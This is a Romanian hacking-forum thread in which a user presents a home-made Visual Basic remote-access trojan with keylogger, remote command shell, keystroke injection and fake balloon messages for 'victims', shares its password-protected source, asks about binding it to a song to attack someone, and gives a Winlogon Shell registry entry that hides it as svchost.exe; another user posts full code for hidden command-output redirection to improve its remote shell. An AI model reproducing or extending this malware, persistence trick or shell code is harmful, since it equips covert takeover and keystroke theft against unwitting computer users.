Jump to content
freshmeat

FreshMeat's Trojan

By freshmeat, in Programe hacking

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

Dragut, felicitari. Dar nu imi plac cateva lucruri. Primul dintre ele ar fi numele. Cred ca se putea gasi un nume mai dragut, nu numele autorului. Pentru send keys folosesti functia SendKeys? Remote cmd afiseaza outputul? Iar la disk drives le puteai pune intr-un combo dupa ce le primeai din server. In rest imi place. Si daca poti sa adaugi transfer de fisiere ca nu e greu, trimiti pe bucati, citesti pe blocuri pe care le trimiti .

freshmeat Newbie

freshmeat

Posted
  • Author
Posted (edited)
Dragut, felicitari. Dar nu imi plac cateva lucruri. Primul dintre ele ar fi numele. Cred ca se putea gasi un nume mai dragut, nu numele autorului. Pentru send keys folosesti functia SendKeys? Remote cmd afiseaza outputul? Iar la disk drives le puteai pune intr-un combo dupa ce le primeai din server. In rest imi place. Si daca poti sa adaugi transfer de fisiere ca nu e greu, trimiti pe bucati, citesti pe blocuri pe care le trimiti .

Mc nytro !

In legatura cu numele troianului sincer nu am stiut ce sa pun ...aveti ceva ideei ?

Cu winsock-ul sunt cam praf mai am de invatat :P

Stii filemanager-ul nu este chiar asa de reusit dar stiu ca se putea si mai bine am inteles ideea cu combo stiu sa o fac dar nu am vrut sa ma mai complic si in plus cate drive-uri sa aibe :P da stiu un pic mai stresant :D

Am postat si Sursa si daca cineva vrea sa implementeze si un file transfer nu am nimic in potriva ...

Mai am de invatat si treaba cu filetransfer-ul ...

la remote cmd nu e mare scofala face treab asta

client : trimite string-ul

server : excuta string-ul ceva de genu : shell ("cmd.exe /c" string primit )

ceva simplu

de exemplu daca dai dir nu iti afiseaza nimic nu am vrut sa ma complic stiu ca se poate ... poate la varianta 2 am sa fac cmd-ul mai util + un skin :D

da folosesc sendkeys ... acum testati si voi va rog ...daca merg corespunzator combinatiile de taste alt + f4 , shift + f2 sau eu stiu ... aveti acolo ..

La keylogger am o mica problema care m-a scos din sarite in ultima vreme i-mi trimite [enter] [enter] [enter] [enter] la infinit asa ca am scos enter-ul

:) :)

La keylogger folosesc GetAsyncKeyState ... dar stiu ca este si o metoda mai buna din cate am auzit eu ... ceva cu directx-ul ... nus nu am incercat ... corectati-ma daca gresesc ..

Oricum o sa fie si varianta 2 mult mai buna :P ...

Pentru un incepator in ale winsock-ului eu zic ca m-am descurcat bine

...

@zippy :

Balloon message : ii trimite victimei un mesaj sub forma de balon (asemanaqtor cu cel de la "update-ul semnaturilor virusilor de la nod 32" sau de la windows updates etc...)

Aici aveti si sursa :

Cam incalcita dar cred ca intelege lumea :)

Download Visual Basic 6.0 Source

Password : rstcenter

Daca vreti si aveti ideei .. modificati sursa si postati modificarea aici ... ;)

Nu ma spupar daca ii puneti titlu by ion sau eu stiu cum nu ma deranjeaza dar toate modificarile vreau sa fie postate aici pe forum nu in alta parte . Multumesc !

Edited by freshmeat
Nytro Mentor

Nytro

Posted
Posted

Am intrebat de SendKeys pentru ca mi se pare ca nu functioneaza pe Vista, si trebuie sa folosesti API-ul SendInput cu care am avut o mica problema... Vreau sa fac in tutorialul meu File Manager si Send File, daca am putin timp cred ca o sa fac. :-? Dar multe mai fac de la un timp :D. Tot zic ca fac si nu am mai facut nimic :). Daca ai intrebari, daca te pot ajuta da-mi un PM :)

freshmeat Newbie

freshmeat

Posted
  • Author
Posted
am si eu o intrebare... serverul daca il bindez de o melodie sa zicem .. functioneaza ? adica se deschida sa pot ataca victima ?

El este deja mascat dupa cum ai observat da cred ca poti sa il bindezi ...

sau daca ai downloadat sursa troianului atunci uite si metoda de infiltrare :

Download

Acidripp Newbie

Acidripp

Posted
Posted
Error

This file is neither allocated to a Premium Account, or a Collector's Account, and can therefore only be downloaded 10 times.

This limit is reached.

To download this file, the uploader either needs to transfer this file into his/her Collector's Account, or upload the file again. The file can later be moved to a Collector's Account. The uploader just needs to click the delete link of the file to get further information.

pune-o pe ftp (http://rstcenter.com/forum/showthread.php?p=87371#post87371)

freshmeat Newbie

freshmeat

Posted
  • Author
Posted

Se instaleaza in windows .

Registry :

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell]

Value = 'Explorer.exe c:\windows\svchost.exe'

Ceva de genu .. .

me.mello Newbie

me.mello

Posted
Posted

Nu m-am uitat peste cod prin simplu fapt: -Remote CMD(cv de genu :P) iar din functiile pe care le-ai precizat nu-mi dovedeste cu nimic faptul ca acest trojan nu se aseamana sau mai rau nu este o copie fidela a unor functii...din sutele de coduri dupa internet. Oricum ai facut treaba buna.

Insa sa revenim la CMD, o sa- ti ofer un exemplu, nescris de mine, care se foloseste de una din cea mai des folosita functie de mine(CreatePipe), si preferata mea pe langa CopyMemory, Practic face redirect CMD output., nefolosindu-se de shellex sau ce functie oi fi scris tu acolo cu parametrii si tot.Daca esti inventiv poti face redirect catre client si viceversa,daca mai ai si experienta modifici si faci si spawn la shell catre client...totu tine de cat vb stii.

In exemplul de mai jos, poti trimite comanda direct de la client catre server, iar output-ul sa fie trimis catre client(trebuie doar sa modifici nitel si sa-ti implementezi tu winsock cum stii. Eu sper sa te ajute pe viitor.


Option Explicit
Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long
Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Type SECURITY_ATTRIBUTES
  nLength As Long
  lpSecurityDescriptor As Long
  bInheritHandle As Long
End Type

Private Type PROCESS_INFORMATION
  hProcess As Long
  hThread As Long
  dwProcessId As Long
  dwThreadId As Long
End Type

Private Type STARTUPINFO
  cb As Long
  lpReserved As Long
  lpDesktop As Long
  lpTitle As Long
  dwX As Long
  dwY As Long
  dwXSize As Long
  dwYSize As Long
  dwXCountChars As Long
  dwYCountChars As Long
  dwFillAttribute As Long
  dwFlags As Long
  wShowWindow As Integer
  cbReserved2 As Integer
  lpReserved2 As Byte
  hStdInput As Long
  hStdOutput As Long
  hStdError As Long
End Type

Private Type OVERLAPPED
    ternal As Long
    ternalHigh As Long
    offset As Long
    OffsetHigh As Long
    hEvent As Long
End Type

Private Const STARTF_USESHOWWINDOW = &H1
Private Const STARTF_USESTDHANDLES = &H100
Private Const SW_HIDE = 0
Private Const EM_SETSEL = &HB1
Private Const EM_REPLACESEL = &HC2

Private Sub Command1_Click()
  Command1.Enabled = False
  Redirect Text1.Text, Text2
  Command1.Enabled = True
End Sub
Private Sub Form_Load()
    Text1.Text = "ping"
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
  If Command1.Enabled = False Then Cancel = True
End Sub

Sub Redirect(cmdLine As String, objTarget As Object)
  Dim i%, t$
  Dim pa As SECURITY_ATTRIBUTES
  Dim pra As SECURITY_ATTRIBUTES
  Dim tra As SECURITY_ATTRIBUTES
  Dim pi As PROCESS_INFORMATION
  Dim sui As STARTUPINFO
  Dim hRead As Long
  Dim hWrite As Long
  Dim bRead As Long
  Dim lpBuffer(1024) As Byte
  pa.nLength = Len(pa)
  pa.lpSecurityDescriptor = 0
  pa.bInheritHandle = True

  pra.nLength = Len(pra)
  tra.nLength = Len(tra)

  If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then
    sui.cb = Len(sui)
    GetStartupInfo sui
    sui.hStdOutput = hWrite
    sui.hStdError = hWrite
    sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES
    sui.wShowWindow = SW_HIDE
    If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, Null, vbNullString, sui, pi) <> 0 Then
      SetWindowText objTarget.hwnd, ""
      Do
        Erase lpBuffer()
        If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) Then
          SendMessage objTarget.hwnd, EM_SETSEL, -1, 0
          SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0)
          DoEvents
        Else
          CloseHandle pi.hThread
          CloseHandle pi.hProcess
          Exit Do
        End If
        CloseHandle hWrite
      Loop
      CloseHandle hRead
    End If
  End If
End Sub

Dupa cum am spus exemplul de mai sus nu e scris de mine, desi ideea asta e veche si folosita de mine dinaintea acestui exemplu. Sper sa te ajute(mai mult de aici nici nu ar fi greu)...spun asta pentru ca la un trojan ce mi se pare cel mai interesant e accesul la un amarat de CMD, fie ca e redirect, sau spawned, fie el cu system privilege sau nu. Bine inteles ca oricand poti face hook catre un process si sa faci asta flawless....dar e foarte greu in vb, mai ales pentru tine...in stadiul asta.

Cu asta fiind spuse, Felicitari.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...